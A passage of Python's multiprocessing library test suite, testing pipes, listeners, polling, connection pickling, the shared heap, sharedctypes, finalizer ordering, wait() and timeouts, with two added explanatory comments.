self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16 MiB
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by the parent
# process immediately after the child is spawned. On Windows this
# sometimes failed on old versions because child_conn would be
# closed before the child got a chance to duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle. This causes
# ConnectNamedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
# verify the state of the heap
all = []
occupied = 0
heap._lock.acquire()
self.addCleanup(heap._lock.release)
for L in list(heap._len_to_seq.values()):
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
for arena, start, stop in heap._allocated_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
self.assertTrue((arena != narena and nstart == 0) or
(stop == nstart))
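# Clarifying note (not in the original test): after sorting, every pair of
# neighbouring blocks must either be contiguous within the same arena
# (stop == nstart) or the second block must start a new arena at offset 0,
# so the heap bookkeeping leaves no overlaps or unaccounted gaps between
# the recorded free and occupied blocks.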
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
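# Why this order (explanatory note, not in the original test): 'a' and 'b'
# were triggered explicitly above; at exit, util._exit_function() runs the
# remaining finalizers in order of decreasing exitpriority, with ties run
# most-recently-registered first (d10, then d03/d02/d01, then e).
# Finalizers registered without an exitpriority ('c') are not run at exit.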
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with test.support.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.time()
res = wait([a, b], expected)
delta = time.time() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.time()
res = wait([a, b], 20)
delta = time.time() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.time()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.time() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.time()
res = wait([a], timeout=-1)
t = time.time() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json, subprocess
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
